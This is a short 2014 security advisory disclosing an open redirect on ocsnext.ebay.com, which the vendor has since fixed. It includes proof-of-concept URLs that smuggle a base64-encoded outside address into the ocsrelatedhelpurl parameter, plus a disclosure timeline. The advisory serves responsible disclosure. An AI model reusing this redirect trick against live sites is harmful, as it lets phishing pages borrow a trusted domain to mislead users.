SSCHADV2014-005 - ocsnext.ebay.com - Open Redirect
Advisory:
|
ocsnext.ebay.com – Open Redirect
|
Advisory ID:
|
SSCHADV2014-005
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on ocsnext.ebay.com
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
The website "ocsnext.ebay.com" is prone to open redirect with a special provided url
======================
PoC-Exploit
======================
// open redirect doesn’t work
// http://www.darksecurity.de/ebay.com.txt = base64(aHR0cDovL3d3dy5kYXJrc2VjdXJpdHkuZGUvZWJheS5jb20udHh0)
PoC-Exploit
======================
// open redirect doesn’t work
// http://www.darksecurity.de/ebay.com.txt = base64(aHR0cDovL3d3dy5kYXJrc2VjdXJpdHkuZGUvZWJheS5jb20udHh0)
http://ocsnext.ebay.com/ocs/trk?ocsrelatedhelpurl=aHR0cDovL3d3dy5kYXJrc2VjdXJpdHkuZGUvZWJheS5jb20udHh0&ocsrelatedhelpText=Resolving+transaction+problems+in+the+Resolution+Center |
// open redirect works
http://www.darksecurity.de/pages.ebay.com.txt = base64(aHR0cDovL3d3dy5kYXJrc2VjdXJpdHkuZGUvcGFnZXMuZWJheS5jb20udHh0)
http://ocsnext.ebay.com/ocs/trk?ocsrelatedhelpurl=aHR0cDovL3d3dy5kYXJrc2VjdXJpdHkuZGUvcGFnZXMuZWJheS5jb20udHh0&ocsrelatedhelpText=Resolving+transaction+problems+in+the+Resolution+Center |
The string "pages.ebay.com" must be provided in the url thereby the open redirect works
======================
Solution
======================
It seems like ebay fixed the problem without feedback
======================
Disclosure Timeline
======================
30-Jan-2014 – ebay informed via "http://pages.ebay.com/securitycenter/Researchers.html"
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.ebay.com/
http://www.darksecurity.de/advisories/2014/SSCHADV2014-005.txt
Comments
Display comments as Linear | Threaded